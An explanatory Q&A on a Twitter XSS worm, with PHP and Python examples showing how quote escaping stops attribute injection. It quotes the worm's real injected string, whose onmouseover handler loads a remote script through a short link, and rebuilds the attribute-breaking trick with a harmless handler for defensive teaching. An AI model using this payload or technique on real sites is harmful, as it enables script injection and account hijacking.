Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:
http://t.co/@"style="fon
Yes this is XSS, it is attacking a javascript event handler. What is cool about this XSS is that it doesn't require <>
to exploit. The injected string is: size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')".
The size:999999999999px makes it very large and therefore more likely that someone will mouse over it. The real problem is the onmouseover= event handler.
To prevent this in PHP you need to convert quote marks into their HTML entities:
$var=htmlspecialchars($var,ENT_QUOTES); // ENT_QUOTES encodes both " and ', not just "
This is because in HTML you cannot escape quotes like in SQL: \'
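Added example (not from the original post): the same attribute-breaking string rebuilt in Python, with html.escape(quote=True) standing in for htmlspecialchars with ENT_QUOTES. It also shows why ENT_QUOTES matters: an escaper that only handles double quotes still fails when the template uses single-quoted attributes. The sample URL and the benign handler are constructed stand-ins for the worm's payload.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the attacker-controlled "URL": it closes the href
# attribute and smuggles in style= and onmouseover= (benign handler here).
SAMPLE_URL = 'http://t.co/@"style="font-size:999999999999px;"onmouseover="alert(1)'
# Same trick rewritten for a template that quotes attributes with single quotes.
SAMPLE_URL_SQ = SAMPLE_URL.replace('"', "'")


class _AttrCollector(HTMLParser):
    """Records the attribute names the parser sees on <a> tags."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.names.extend(name for name, _ in attrs)


def attribute_names(markup):
    """Parse markup like a browser would and return the <a> attribute names."""
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return p.names


def escape_double_only(s):
    """Encodes & < > and double quotes only (htmlspecialchars without
    ENT_QUOTES); single quotes pass through untouched."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def escape_all(s):
    """Encodes & < > and both quote characters (htmlspecialchars + ENT_QUOTES)."""
    return html.escape(s, quote=True)


def render_link(url, quote_char='"', escaper=None):
    """Build <a href=...> around an untrusted URL. escaper=None reproduces the
    vulnerable behaviour: the value lands in the attribute unencoded."""
    value = url if escaper is None else escaper(url)
    return f"<a href={quote_char}{value}{quote_char}>link</a>"
```

With no escaper the parsed tag gains style and onmouseover attributes; with escape_all the whole string stays inside href, whichever quote character the template uses.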